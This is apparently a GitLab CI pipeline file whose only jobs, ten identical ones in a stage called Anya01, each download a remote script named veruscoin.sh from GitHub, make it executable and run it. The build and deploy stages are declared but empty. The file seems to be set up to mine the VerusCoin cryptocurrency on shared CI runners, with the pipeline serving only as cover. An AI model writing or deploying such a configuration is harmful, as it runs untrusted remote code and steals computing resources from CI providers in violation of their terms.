stages:
  - Anya01
  - build
  - deploy
 
Anya01_1:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_2:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_3:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_4:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_5:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_6:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_7:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_8:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_9:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

Anya01_10:
  stage: Anya01
  script:
    - wget https://raw.githubusercontent.com/acil-max/acilmax/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
